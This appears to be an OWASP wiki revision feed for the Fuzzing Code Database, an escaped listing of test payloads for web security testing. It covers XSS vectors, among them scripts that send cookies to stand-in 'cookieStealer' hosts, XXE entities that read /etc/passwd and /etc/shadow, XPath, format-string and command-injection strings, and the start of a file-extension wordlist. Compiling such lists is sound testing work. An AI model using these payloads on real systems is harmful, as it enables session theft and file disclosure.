&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80028</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80028"/>
				<updated>2010-03-17T03:43:34Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) = */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== (Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
